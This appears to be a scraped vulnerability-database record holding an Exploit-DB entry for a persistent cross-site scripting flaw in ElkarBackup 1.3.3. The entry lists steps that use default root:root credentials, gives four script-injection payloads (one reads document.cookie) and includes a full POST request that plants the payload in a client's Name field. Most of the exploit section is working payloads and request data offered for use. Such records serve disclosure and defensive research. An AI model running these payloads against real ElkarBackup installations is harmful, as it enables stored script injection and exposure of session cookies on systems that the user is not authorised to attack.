{"id": "EDB-ID:48756", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "ElkarBackup 1.3.3 - Persistent Cross-Site Scripting", "description": "", "published": "2020-08-20T00:00:00", "modified": "2020-08-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/48756", "reporter": "Enes \u00d6zeser", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-05-13T17:45:38", "viewCount": 193, "enchantments": {"dependencies": {}, "score": {"value": 4.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-35249"]}]}, "exploitation": null, "vulnersScore": 4.1}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/48756", "sourceData": "# Exploit Title: ElkarBackup 1.3.3 - Persistent Cross-Site Scripting\r\n# Date: 2020-08-14\r\n# Exploit Author: Enes \u00d6zeser\r\n# Vendor Homepage: https://www.elkarbackup.org/\r\n# Version: 1.3.3\r\n# Tested on: Linux\r\n\r\n1- Go to following url. >> http://(HOST)/elkarbackup/login\r\n2- Default username and password is root:root. We must know login credentials. \r\n3- Go to \"Jobs\" and press \"Add client\" button.\r\n4- Write XSS payload in \"Name\" section.\r\n5- Press \"Save\" button.\r\n\r\n(( Executable XSS Payloads ))\r\n\r\n1- \"><script>alert('XSS Confirmed!');</script>\r\n2- \"><script>alert(\"XSS Confirmed!\");</script>\r\n3- \"><script>alert(document.cookie);</script>\r\n4- \"><script>alert(document.domain);</script>\r\n\r\n\r\n(( REQUEST ))\r\n\r\nPOST /elkarbackup/client/2 HTTP/1.1\r\nHost: (HOST)\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://(HOST)/elkarbackup/client/2\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 358\r\nConnection: close\r\nCookie: PHPSESSID=dop3m1qj8c5octaxuasd21as2\r\nUpgrade-Insecure-Requests: 1\r\n\r\nClient%5Bname%5D=%22%3E%3Cscript%3Ealert%28%22XSS+Confirmed%21%22%29%3C%2Fscript%3E&\r\nClient%5Burl%5D=&Client%5Bquota%5D=-1&Client%5Bdescription%5D=&Client%5BisActive%5D=1&\r\nClient%5BmaxParallelJobs%5D=1&Client%5Bowner%5D=1&Client%5BsshArgs%5D=&Client%5BrsyncShortArgs%5D=&\r\nClient%5BrsyncLongArgs%5D=&Client%5B_token%5D=yrL8pXqx-sTVYhLQBpL523I-BOnSqoRyZnd5MUt2bfI", "osvdbidlist": [], "exploitType": "webapps", "verified": false}
{}
ElkarBackup 1.3.3 - Persistent Cross-Site Scripting